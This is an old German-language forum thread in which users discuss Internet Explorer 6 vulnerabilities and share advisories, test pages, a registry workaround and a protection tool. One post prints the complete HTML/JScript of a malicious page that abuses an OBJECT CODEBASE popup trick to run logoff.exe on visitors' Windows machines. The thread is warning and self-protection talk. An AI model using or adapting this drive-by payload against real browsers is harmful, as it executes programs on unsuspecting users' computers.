Sicherheitslücke im Internet Explorer 6 SP1

#1 Hi

ich habe wirklich langsam das verzweifelte Gefühl Microsoft bekommt das nie gebacken: Es gibt (immer noch) eine sehr grosse Sicherheitslücke im Internet Explorer, die es möglich macht, Programme auf dem Client PC auszuführen.

hier könnt ihr euren Rechner testen:
http://www.planet-xp.de/modules.php?name=News&file=article&sid=513

Tille
__________
Anonymität im Internet ist, wenn Du keinen kennst, aber alle Dich.

#2 Ich frage mich ernsthaft, wieso Leute immer noch auf MS-Produkte
vertrauen und sich immer das Neueste gleich auf die Kiste laden und verwenden müssen.(Ich nehme an ein gut gepatchter IE 5.X ist für das Web völlig ausreichend, oder?!)
Es ist absolut und hinreichend bekannt (!!!), dass jedes neue MS-Produkt
erst mal voller Pannen ist, die u.U sogar den Rechner und die Privatsphäre
gefährden. Man ist ständig am Asschau halten nach neuen Servicepacks, mit denen man dann gewissermaßen stets im Hintertreffen ist.
Bestes Beispiel ist XP.....Wenn ich mir die "Htis" und "Postings" zu XP-Themen anschau.....jede Menge von Leuten haben das Ding auf der Kiste.
Entweder man jammert dann rum über die Spionage-Türchen und Lücken, oder kämpft mit Tools und Teufel gegen die kleinen und grossen "Gemeinheiten" an.
Ein einziger Irrwitz in meinen Augen, .....nun verwende ich selbst Windows
(98 lite und kein IE ;-) )....is bestimmt auch nicht die "Glanzgeburt", aber auf Grund des betagten Alters sind Lücken und Mängel bekannt und man kann gezielter etwas unternehmen und stochert nicht im Nebel.
Meinungen? ;-)
__________
Durchsuchen --> Aussuchen --> Untersuchen

#3 Hi Joschi,

ich habe eigentlich auch immer die neusten Updates und Servicepacks für meine Microsoft Produkte drauf... - macht eigentlich mehr Sinn, da viele Bugs in den neuen Version schon gefixt sind.
Neue Bugs, die auftauchen funktionieren auch meist in älteren Versionen der Software:

Beispiel:
Heute (04.03.02) von Heise veröffentlichter Bug der nur im IE 5.5 funktioniert
Internet Explorer führt lokale Dateien aus

Gruß
Tille
__________
Anonymität im Internet ist, wenn Du keinen kennst, aber alle Dich.

#4 Hi Tille,

wie man sieht wird der Bug auch schon fleissig von Websites ausgenutzt:

Achtung gefährlicher Link:
hxxp://www.turboflux.net/xp_rules.jpg
(Computer fährt herunter)

der Trick bei diesem Link ist, das dort einfach ein Ordner existeriert, der xp_rules.jpg heisst und indem eine index.html Datei mit folgendem Inhalt ist:

Code

##!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"## 
##HTML## 
##HEAD## 
##TITLE##IE6 security...##/TITLE## 

##META http-equiv=Content-Type content="text/html; charset=windows-1252"## 
##SCRIPT language=JScript## 

var programName=new Array( 
'c:/windows/system32/logoff.exe', 
'c:/winxp/system32/logoff.exe', 
'c:/winnt/system32/logoff.exe' 
); 

function Init(){ 
var oPopup=window.createPopup(); 
var oPopBody=oPopup.document.body; 
var n,html=''; 
for(n=0;n##programName.length;n++) 
html+="##OBJECT NAME='X' [color="red"]->[/color]
CLASSID='CLSID:11111111-1111-1111-1111-111111111111' [color="red"]->[/color]
CODEBASE='"+programName[n]+"' %1='r'####/OBJECT##"; 
oPopBody.innerHTML=html; 
oPopup.show(290, 390, 200, 200, document.body); 
} 

##/SCRIPT## 
##/head## 
##BODY onload="Init()"## 
You should feel lucky if you dont have XP right now. 
##/BODY## 
##/HTML## 

WinXP Rechner werden beim clicken darauf heruntergefahren...

gefahrenlos testen könnt ihr das hier: http://www.heise.de/ct/browsercheck/e5demo10.shtml

mehr Infos um sich zu schützen hier: http://www.golem.de/0203/18595.html

Gruß
Lukas
__________
Gruß Lukas

#5 Übrigens:

Sicherheitslücke in Microsofts Java-Machine (Update) - Golem sowie
Microsoft warnt vor Leck in seiner Virtual Machine - PCWelt

und hier gleich ein » Patch für alle Windows Versionen

i love Opera
__________
Gruß Lukas

#6 Solange kein Patch verfügbar ist, hilft es folgenden Eintrag in der Registry zu ändern:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
Den Wert bei 1004 (DWORD) von 0 auf 3 ändern.

#7 hab ich woanders gefunden:

Zitat

Das Problem:
Durch eine Schwachstelle bei der Verarbeitung von dynamisch eingefügten HTML-Fragmenten können arglistige Webseiten oder
HTML-E-Mails beliebige Programme auf dem System des die arglistige Webseite/HTML-E-Mail betrachtenden Benutzers aufrufen. Es wurde nun eine Möglichkeit gefunden, das Aufrufen beliebiger Programme auch ohne den Einsatz von ActiveScripting oder ActiveX zu realisieren. Dadurch stehen derzeit beim Einsatz des Microsoft Internet Explorers, mit Ausnahme von HTTP-Filterprogrammen, keine Schutzmöglichkeiten zur Verfügung. Sollte ferner eine Möglichkeit gefunden werden den Programmaufrufen beliebige Parameter zu übergeben, so könnte dies zu
einer Benutzer-/Systemkompromittierung führen.
Weitere Infos zum Problem:
http://www.network-secure.de/CERT_Schwachstelle_IE_020302.php3
http://security.greymagic.com/adv/gm001-ie/

Schutz-Tool :
http://www.nsclean.com/dsostop.html
Damit lässt sich die Verwundbarkeit an- oder abstellen.

...sollte auf jeden Fall vorläufig helfen
__________
Gruß Lukas

#8 jooo lukas soviel zu dem "patch opera" der alle Probleme beseitigen soll:
http://www.heise.de/ct/browsercheck/odemo.shtml

#9 Ops,

ich fühlte mich mit Opera immer sooo sicher, aber ist klar, wenn da was aus Java drin integriert ist:

Die Meldungen über Sicherheitslücken in Java scheinen momentan auch einfach nicht abzureissen: http://www.heise.de/newsticker/data/kav-21.03.02-000/

Gruß Lukas
__________
Gruß Lukas

#10 Ich eröffne jetzt kein neues Thread, da ich nicht weiss, was an der Meldung dran sein kann:

http://www.lac.co.jp/security/english/snsadv_e/48_e.html

in ihr wir mitgeteilt, das man die Download Funktion des IE deaktivieren sollte, da sonst jede beliebige Datei automatisch heruntergeladen und ausgeführt werden könnte... Das wäre ziemlich schlimm, bei den vielen Dialern im Netz

weiss jemand Details?

#11 Schwachstelle im Microsoft Internet Explorer 6.0
Gefahrenpotenzial hoch bis sehr hoch
mehr unter:
http://www.astalavista.ch/news/detail.php?ID=394
oder bei rus-cert
http://www.rus-cert.de/ticker/article.php?mid=751

#12 Hi Jimbeam,

genau daher habe ich das auch und Astalavista hats vom RUS-CERT und RUS-CERT verweisst auf http://www.lac.co.jp/security/english/snsadv_e/48_e.html

wie und ob diese Sicherheitslücke jedoch wirklich nachweisbar existiert, kann ich noch nicht genau sagen...

Greetz

#13 ups, yep, eigentlich logisch, ich hab nicht darauf geachtet. Hm das Prob besteht aber nicht erst seit gestern.
Schau unter http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0727, dort sind einige info-Quellen zu finden

#14 Hi ihr beiden:

an dieser Sache ist was dran:
http://www.securitytracker.com/alerts/2002/Mar/1003839.html

Microsoft selbst bestätigt es, jedoch habe ich noch nicht herausfinden können, wie diese Sicherheitslücke genau funktioniert!

Schützen kann man sich davor wie schon beschrieben, indem man die Download Optionen deaktiviert...

Lukas
__________
Gruß Lukas

#15 Also ich weiss wie das geht. Ist ganz einfach.

AIM: tmcotaku